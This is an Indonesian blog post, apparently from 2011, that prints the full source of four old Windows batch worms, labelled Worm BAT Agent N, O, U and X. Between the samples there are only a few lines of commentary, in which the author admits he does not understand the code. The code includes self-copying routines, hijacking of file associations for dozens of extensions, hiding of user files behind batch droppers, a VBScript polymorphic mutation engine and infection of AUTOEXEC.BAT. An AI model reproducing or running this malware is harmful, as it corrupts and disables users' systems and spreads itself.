Sunday, October 9, 2011

Melihat DNA Worm Virus Zaman Terdahulu


Hacking Source Code of Worm Virus [ Worm BAT Agent  ]
Created by Haze Lee Kaizera a.k.a Minak Djinggo

            Saya telah mendapatkan salah satu sample virus worm disebuah situs yang memiliki kumpulan database virus,disini kaiz mengambil sample virus - Worm BAT Agent k -
Karena dalam situsnya tidak dijelaskan bahaya dari virus worm ini ,
Akhirnya memaksa saya untuk melihat isi dari virus worm ini,

            Dan apa yang saya temukan adalah sebuah DNA Worm virus yang membuat saya tidak mengerti , lihat gambar ini :

Maaf untuk sementara gambar tidak ditampilkan




Dan ini adalah Source Code Of  Worm BAT Agent N
@echo off
title virus poliformo para karpesky Lab saltando HIPS todas las proteciones!!
color 04
cls
echo.
echo.
echo.     .....:::::::virus poliformo by:Davile  :::::::..........
echo.
echo.
ping -n 3 192.168.1.64 >nul
set contador:0
:uno
echo.01010101010101010100101010
echo.10101010101010100010101001
echo.10101010101010101010101010
echo.01010101010101011010101010
echo.01010101010101101101110110
echo.01010110101010101010010101
echo.01010101010101010101010110
echo.01101010101010101010101011
echo.01010010101010101010101010
echo.01010101010101010110101010
echo.01101010110101001010101010
echo.01010101010101010101010101
echo.01010101001010010101010101
set/a counter=%counter%+1
if %counter%==100 (goto dos) else (goto uno)
:dos
copy %0 C:\
mkdir C:\copia1
echo @echo off> c:\copia1\copia1.txt
echo title copia de virus poliformo>> C:\copia1\copia1.txt
echo color 04>> C:\copia1\copia1.txt
echo cls>> C:\copia1\copia1.txt
echo echo. jajajajaja te has jodido>> c:\copia1\copia1.txt
echo echo. jajajajaja te has jodido>> c:\copia1\copia1.txt
echo echo. jajajajaja te has jodido>> c:\copia1\copia1.txt
echo echo. jajajajaja te has jodido>> c:\copia1\copia1.txt
echo echo. jajajajaja te has jodido>> c:\copia1\copia1.txt
echo echo. jajajajaja te has jodido>> c:\copia1\copia1.txt
echo echo. jajajajaja te has jodido>> c:\copia1\copia1.txt
echo echo. jajajajaja te has jodido>> c:\copia1\copia1.txt
echo echo. jajajajaja te has jodido>> c:\copia1\copia1.txt
echo echo. jajajajaja te has jodido>> c:\copia1\copia1.txt
echo echo. jajajajaja te has jodido>> c:\copia1\copia1.txt
echo echo. jajajajaja te has jodido>> c:\copia1\copia1.txt
echo echo. espera un momento en lo que mi virus jode tu pc>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
echo @echo #>> c:\copia1\copia1.txt
goto cinco
:cinco
echo @echo off> c:\copia1\copia2.txt
echo title copia de virus poliformo>> C:\copia1\copia2.txt
echo color 04>> C:\copia1\copia2.txt
echo cls>> C:\copia1\copia2.txt
echo cd\>> c:\copia1\copia2.txt
echo cd "%programfiles%">> c:\copia1\copia2.txt
echo assoc .exe=txtfile>> c:\copia1\copia2.txt
echo assoc .bat=hackfile>> c:\copia1\copia2.txt
echo assoc .com=hackfile>> c:\copia1\copia2.txt
echo assoc .txt=hackfile>> c:\copia1\copia2.txt
echo assoc .cmd=hackfile>> c:\copia1\copia2.txt
echo assoc .mp3=hackfile>> c:\copia1\copia2.txt
echo assoc .jpg=hackfile>> c:\copia1\copia2.txt
echo assoc .jpeg=hackfile>> c:\copia1\copia2.txt
echo assoc .vbs=hackfile>> c:\copia1\copia2.txt
echo assoc .wav=hackfile>> c:\copia1\copia2.txt
echo assoc .avi=hackfile>> c:\copia1\copia2.txt
echo assoc .wma=hackfile>> c:\copia1\copia2.txt
echo assoc .pps=hackfile>> c:\copia1\copia2.txt
echo assoc .gid=hackfile>> c:\copia1\copia2.txt
echo assoc .pif=hackfile>> c:\copia1\copia2.txt
echo assoc .doc=hackfile>> c:\copia1\copia2.txt
echo assoc .bas=hackfile>> c:\copia1\copia2.txt
echo assoc .obj=hackfile>> c:\copia1\copia2.txt
echo assoc .dll=hackfile>> c:\copia1\copia2.txt
echo assoc .dvr=hackfile>> c:\copia1\copia2.txt
echo assoc .scr=hackfile>> c:\copia1\copia2.txt
echo assoc .lnk=hackfile>> c:\copia1\copia2.txt
echo assoc .cab=hackfile>> c:\copia1\copia2.txt
echo assoc .rar=hackfile>> c:\copia1\copia2.txt
echo assoc .zip=hackfile>> c:\copia1\copia2.txt
echo assoc .hlp=hackfile>> c:\copia1\copia2.txt
echo assoc .ini=hackfile>> c:\copia1\copia2.txt
echo assoc .cmh=hackfile>> c:\copia1\copia2.txt
echo assoc .hta=hackfile>> c:\copia1\copia2.txt
echo assoc .ppt=hackfile>> c:\copia1\copia2.txt
echo assoc .xls=hackfile>> c:\copia1\copia2.txt
echo assoc .bmp=hackfile>> c:\copia1\copia2.txt
echo assoc .tmp=hackfile>> c:\copia1\copia2.txt
echo assoc .gif=hackfile>> c:\copia1\copia2.txt
echo assoc .gbd=hackfile>> c:\copia1\copia2.txt
echo assoc .ib=hackfile>> c:\copia1\copia2.txt
echo assoc .fbd=hackfile>> c:\copia1\copia2.txt
echo assoc .png=hackfile>> c:\copia1\copia2.txt
echo assoc .arj=hackfile>> c:\copia1\copia2.txt
echo assoc .dar=hackfile>> c:\copia1\copia2.txt
echo assoc .sac=hackfile>> c:\copia1\copia2.txt
echo assoc .cat=hackfile>> c:\copia1\copia2.txt
echo assoc .inf=hackfile>> c:\copia1\copia2.txt
echo assoc .mmf=hackfile>> c:\copia1\copia2.txt
echo assoc .dat=hackfile>> c:\copia1\copia2.txt
echo assoc .sfp=hackfile>> c:\copia1\copia2.txt
echo assoc .mpg=hackfile>> c:\copia1\copia2.txt
echo assoc .mpeg=hackfile>> c:\copia1\copia2.txt
rename C:\copia1\copia1.txt copia1.bat
rename c:\copia1\copia2.txt copia2.bat
ping -n 5 192.168.1.64 >nul
set contador1:0
:final
start C:\poliformo.bat
set/a fina1=%fina1%+1
if %fina1%==20 (goto finalr) else (goto final)
ping -n 5 192.168.1.64 >nul
msg *XDDDDD pensaste que ya e acabado pues mira lo que le pasa a tu pc
msg *XDDDDD XDDDDD XDDDDD XDDDDD XDDDDDD xDDDDDDDD XDDDDDD XDDDDDDDD
set contador2:0
:finalr
start c:\copia1\copia1.bat
set/a finae=%finae%+1
if %finae%==20 (goto ultimo) else (goto finalr)
set ultimor:0
:ultimo
msg * XDDD que paso pensaste que solo era un susto
msg * xd pues ya no podras usar tu pc XDDDDDDDDDD
goto ultimot
:ultimot
start c:\copia1\copia2.bat
set/a ultimoy=%ultimoy%+1
if %ultimoy%==20 (goto hasta) else (goto ultimot)
:hasta
msg * kmara hasta la proxima este virus fue creado by Davile
msg * si lo quieres copiar solo recuerda quien lo hizo
msg * postea la fuente no seas lammo no reconocer al autor es de lammo's
msg *................:::::::::Davile:::::........................

            Gaya bahasa dan grammarnya menggunakan bahasa spanish , kemungkinan worm virus ini berasal dari spanyol , sayangnya saya tidak mempunyai waktu untuk memahami script ini. Hanya bisa melihat-lihat dan mencoba memahami berharap dan mencoba bisa mengetahui maksud intruksi-intruksi tersebut :D

Source Code Of  Worm BAT Agent O
@echo off
if not exist %Windir%\System32\WinLog.vsc copy %0 %Windir%\System32\WinLog.vsc
for %%f in (*.exe;*.wmv;*.avi;*.jpg;*.jpeg) do set ipt=%%f
ren %ipt% X%ipt%
attrib +s +h X%ipt%
copy %Windir%\System32\WinLog.vsc %ipt%.bat
echo if exist X%ipt% start X%ipt% >>%ipt%.bat
if exist .bat del /Q .bat

Source Code Of  Worm BAT Agent U
@set ehvek=echo
@set pqamo=copy

%ehvek% set ff=createobject("scripting.filesystemobject")>>poly.vbs
%ehvek% set rr=ff.opentextfile(%0,1)>>poly.vbs
%ehvek% aa = rr.readall>>poly.vbs
%ehvek% rr.close>>poly.vbs
%ehvek% Randomize>>poly.vbs
%ehvek% poly = int(rnd * 3)>>poly.vbs
%ehvek% if poly = 0 or poly = 2 then>>poly.vbs
%ehvek% s = chr(int(22 * rnd) + 97)>>poly.vbs
%ehvek% rand1 = Replace(aa,"ehvek","ehvek" ^& s ^& poly)>>poly.vbs
%ehvek% rand2 = Replace(rand1,"pqamo","pqamo" ^& s ^& s ^& poly)>>poly.vbs
%ehvek% else>>poly.vbs
%ehvek% polynum = int(rnd * 7)>>poly.vbs
%ehvek% for i = 1 to polynum>>poly.vbs
%ehvek% polychar = chr(int(22 * rnd) + 97)>>poly.vbs
%ehvek% polyall = polyall + polychar>>poly.vbs
%ehvek% next>>poly.vbs
%ehvek% s = chr(int(22 * rnd) + 97)>>poly.vbs
%ehvek% rand1 = Replace(aa,"ehvek",polyall )>>poly.vbs
%ehvek% rand2 = Replace(rand1,"pqamo", s ^& polyall)>>poly.vbs
%ehvek% end if>>poly.vbs
%ehvek% set bb=ff.opentextfile(%0,2)>>poly.vbs
%ehvek% bb.write rand2>>poly.vbs
@cscript poly.vbs
@del poly.vbs
@exit

Source Code Of  Worm BAT Agent X
@echo off
@rem
@set inf=n
@rem
@set infe=n
@rem
@if %INF%==Y goto scanne
@rem
@echo @SET INF=Y >b.222
@rem
@echo @call %0.bat >>b.222
@rem
@echo @echo !>>b.222
@rem
@TYPE AUTOEXEC.BAT >>b.222
@rem
@COPY b.222 AUTOEXEC.BAT >NUL
@rem
@SET INF=Y
@rem
:scanne
@IF %infe%==Y GOTO END
@rem
@c:
@rem
@cd\
@rem
@dir %0.bat /s | find /i "Dire" >c:\b.222
@rem
@echo exit >>c:\b.222
@echo @copy %%2\%0.bat c:\ >c:\dire.bat
@rem
@command nul
@rem
@c:
@cd\
@dir /ad /s|find /i "Dire" >b.222
@rem
@echo exit >> b.222
@rem
@echo @if not exist %%2%0.bat copy c:\%0.bat %%2 >c:\dire.bat
@rem
@command < b.222 > nul
@rem
@del b.222
@rem
@del dire.bat
@del %0.bat
@rem
@SET infe=Y
:END
@echo !!
@rem

            Semua itu adalah DNA Worm Virus, benar-benar menakjubkan.
Sekian dahulu mungkin diartikel/ebook berikutnya kita akan berjalan-jalan kembali untuk melihat DNA virus lainya. :)

Download Ebook Melihat DNA Worm Virus Zaman Terdahulu(.pdf) :
Click Here

Labels:

posted by anak8garut @ 1:14 AM